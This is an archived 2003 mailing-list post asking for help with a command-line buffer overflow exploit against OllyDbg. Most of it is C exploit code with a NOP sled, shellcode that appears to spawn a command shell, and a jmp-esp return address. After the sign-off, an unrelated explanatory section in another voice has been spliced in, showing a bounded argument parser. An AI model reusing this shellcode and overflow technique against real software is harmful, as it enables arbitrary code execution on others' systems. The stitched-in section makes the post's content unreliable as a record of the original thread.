win32 command line overflows: (ex: ollydbg.exe)

From: wirepair <wirepair(at)roguemail.net>
Date: Thu Jun 05 2003 - 08:24:45 EDT


Hello all,

Just messing around with win32 overflows, and I've run into a small problem with command line overflows. Ollydbg has a buffer overflow when you call a program with a large command line. (I found this when trying to debug rasphone.exe in WinXP (rasphone -f <1000 'a'>); I was expecting Ollydbg to run the program but it crashed itself: "Error in Instruction 0x41414141 while trying to 'read' 0x41414141".) So I tried to write an exploit for Ollydbg.

Issue #2: Visual C++ crashes as well when I'm trying to debug ollydbg, so I have to do this blindly. My exploit buffer looks like:
ollydbg.exe ollydbg.exe <200 NOPS>Shellcode<more nops>[&EIP]<nops>
I'm trying to use CreateProcess to call ollydbg.exe but it doesn't do anything, no crash, no nothing. So I saved the exploit buffer to a file and tried to 'paste' it (heh). It doesn't crash even though there are over 600 characters... (Ollydbg.exe overwrites EIP at 508-511, I think; I can't debug it!)
Anyway, here's my code; any insight on why this isn't working is greatly appreciated:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv) {

	char exp_buff[1024];
	int x, i;
	char ollyfile[100];
	DWORD jmpesp = 0x77E9AE59; // jmp esp call in kernel32.dll
	unsigned char shellcode[19] =
		"\xC7\x45\xFD\x63\x6D\x64\x20\x8D\x45\xFD\x50\xB8\x35\xFD\xE6\x77\xFF\xD0"; //tiny sc
	PROCESS_INFORMATION pi;
	STARTUPINFOA si;

	if (argc != 2) {
		fprintf(stderr, "heh: %s \n", argv[0]);
		exit(1);
	}
	strncpy(ollyfile, argv[1], 99);
	ollyfile[99] = 0x00;   // terminator must stay inside the 100-byte array

	x = strlen(ollyfile);
	memset(exp_buff, 0x90, 1024); // fill the whole buffer with NOPs

	memcpy(exp_buff, ollyfile, x); // command line begins with the program name
	exp_buff[x] = ' ';

	memcpy(exp_buff + 200, shellcode, 19); // shellcode at offset 200 (its NUL is copied too)
	exp_buff[218] = 0x90;                  // overwrite that NUL so the string continues
	for (i = 219; i <= 508; i++) {
		exp_buff[i] = 0x90;
	}
	memcpy(exp_buff + 508, &jmpesp, 4);    // return address at the EIP offset (508-511)
	exp_buff[1023] = 0x00;                 // terminator must stay inside the 1024-byte array
	fprintf(stderr, "%s", exp_buff); //debugging heh

	// STARTUPINFO has to be zeroed with cb set, otherwise CreateProcess can fail outright
	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi, sizeof(pi));

	if (!CreateProcessA("E:\\ollydbg\\ollydbg.exe", exp_buff, NULL,
			NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
		fprintf(stderr, "CreateProcess failed: %lu\n", GetLastError());
		return 1;
	}
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);

	return(0);
}

Thanks
-wire
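The crash described in this post has the classic shape of a command-line overflow: a launcher copies an argument of attacker-chosen length into a fixed-size stack buffer, so a long "-f" value overwrites the saved return address. The following is an added, portable C example (it is not the poster's code and not OllyDbg's or rasphone's own parser) that shows the unbounded pattern beside a bounded version which rejects an overlong argument instead of overflowing. The names `parse_file_arg`, `PATH_BUF_SZ` and the sample command lines are hypothetical and constructed for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed fixed-size destination for the "-f <path>" argument (MAX_PATH-like).
 * This is an assumption for the example, not a value taken from any real program. */
#define PATH_BUF_SZ 260

/* Vulnerable shape: an unbounded copy of an attacker-sized token into a
 * fixed buffer. Shown only for contrast; nothing below calls it. */
void parse_file_arg_unbounded(const char *cmdline, char *out)
{
	const char *p = strstr(cmdline, "-f ");
	if (p) strcpy(out, p + 3);   /* writes past 'out' on a long argument */
}

/* Hardened shape: the copy is limited by the destination size and an
 * overlong argument is rejected rather than silently truncated.
 * Returns 0 on success, -1 if "-f" is absent, -2 if the value does not fit. */
int parse_file_arg(const char *cmdline, char *out, size_t outsz)
{
	const char *p = strstr(cmdline, "-f ");
	if (!p) return -1;
	p += 3;
	size_t n = strcspn(p, " ");  /* value ends at the next space or at NUL */
	if (n >= outsz) return -2;   /* keep room for the terminator */
	memcpy(out, p, n);
	out[n] = '\0';
	return 0;
}

/* Constructed input mirroring the post: "rasphone -f " followed by 1000 'A's.
 * Returns -2: the value is rejected and no byte lands outside 'path'. */
int demo_long_argument(void)
{
	char path[PATH_BUF_SZ];
	static char cmd[1100];
	memcpy(cmd, "rasphone -f ", 12);
	memset(cmd + 12, 'A', 1000);
	cmd[1012] = '\0';
	return parse_file_arg(cmd, path, sizeof path);
}

/* Constructed input with a normal-length value.
 * Returns 1 when the value is parsed and terminated correctly. */
int demo_short_argument(void)
{
	char path[PATH_BUF_SZ];
	if (parse_file_arg("rasphone -f C:\\book.pbk", path, sizeof path) != 0) return 0;
	return strcmp(path, "C:\\book.pbk") == 0;
}

int main(void)
{
	printf("1000-byte argument: %d (expect -2, rejected)\n", demo_long_argument());
	printf("short argument parsed correctly: %d (expect 1)\n", demo_short_argument());
	return 0;
}
```

The point of the bounded version is that the destination size is an explicit parameter checked before any byte is written; the same discipline applies to the debugger side of the post, where the program under test's command line is an input of untrusted length just like any other.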



Received on Thu Jun 5 14:41:59 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:40 EDT

